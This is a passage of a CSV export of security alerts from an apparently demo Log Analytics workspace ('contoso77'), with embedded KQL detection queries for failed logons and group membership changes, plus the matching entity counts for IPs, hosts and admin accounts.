""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11752"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1716"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 11752
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 11752
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 3845
},
{
""$id"": ""6"",
""Name"": ""Administrator"",
""NTDomain"": ""DHCPContoso77"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 2218
},
{
""$id"": ""7"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 722
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:36:03,,,
32,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 19:18:10,2019-01-10 20:18:10,6a52c089-ed6b-4a05-859c-d731ad9f2b32,b3f02c05-e844-4161-81d6-d736548d91ae,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-10T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 20:38:16,,,
33,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:33:55,2019-01-14 06:33:55,6a4e389d-9678-41ee-93a3-ca8ae818c8b0,985be534-6f40-4b0c-a951-8f3915eacd61,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33167"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:44:00,,,
34,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 19:18:10,2019-01-13 20:18:10,f115c35a-88b0-4d16-9aa3-977a45278297,790217fc-9597-4159-b469-bb383c747435,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-13T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 20:28:13,,,
35,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:33:55,2019-01-13 06:33:55,63ca5203-9bc4-425e-9f25-e9dcfaedb443,6a7aaa2e-a575-4e8b-87ed-0d964bf1005e,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25435"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:43:59,,,
36,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 05:38:06,2019-01-13 05:38:06,d0b18c55-6af1-482b-a050-7e7ca1ae923d,bc44b302-78c7-4be8-bf70-d39d6935fd74,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trus was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25542"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 25542
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25542
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 25542
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 05:48:09,,,
37,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:25:57,2019-01-13 06:25:57,806b0946-13f8-4882-96fc-5b81ef4af691,c76f17e2-e739-4e7e-bf17-4dd163fc831f,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25449"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1598"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 25449
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25449
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5223
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1353
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 579
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:36:03,,,
38,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:31:40,2019-01-13 06:31:40,a6c60b76-dcdf-45c5-be56-9d98f5649e50,07be11df-3dbf-49a5-8b5a-dcea75d89993,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25431"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1597"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 25431
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25431
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5222
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1356
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 578
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:41:45,,,
39,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:31:42,2019-01-13 06:31:42,e586082e-35d2-4a01-9fd3-e9cd91259c99,09ec519f-96b0-4332-be30-b0379c8cbd04,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Plao Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25430"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1597"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 25430
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25430
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5222
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1356
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 578
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:41:46,,,
40,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 05:38:06,2019-01-14 05:38:06,7b758942-59cd-4b84-93f1-50517a6a9316,5d733fc8-ff32-436d-a595-beaf8943bd63,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trus was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""32769"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total Account Entities"": ""1"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 32769
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 32769
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 32769
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 05:48:14,,,
41,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:31:40,2019-01-14 06:31:40,7aa7c6b9-e08b-4229-90fa-d89a23cfa9df,47445dca-b87d-45f5-9073-b713e3c69a56,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33169"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1631"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 33169
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 33169
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 10662
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1764
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 952
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:41:46,,,
42,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:31:42,2019-01-14 06:31:42,03ec4bb4-878f-4999-8ff7-af9a66e11c78,45176796-d3f9-40ce-a8f2-aba9bb3c8063,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Plao Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33170"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1631"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 33170
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 33170
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 10662
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1764
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 952
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:41:52,,,
43,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:25:57,2019-01-14 06:25:57,68cd3c80-5b36-49e1-82a9-395b5e793626,54a8f6d8-f69b-4872-96f8-ef274d5fc8d4,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33154"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1631"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 33154
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 33154
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 10645
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1765
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 949
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:36:02,,,
44,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 21:18:10,2019-01-15 22:18:10,3197aa65-2708-4a36-82dd-55fc3ed3f01d,cbdce694-666c-4844-a29c-e7f4b66e27d1,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-15T22%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 22:28:16,,,
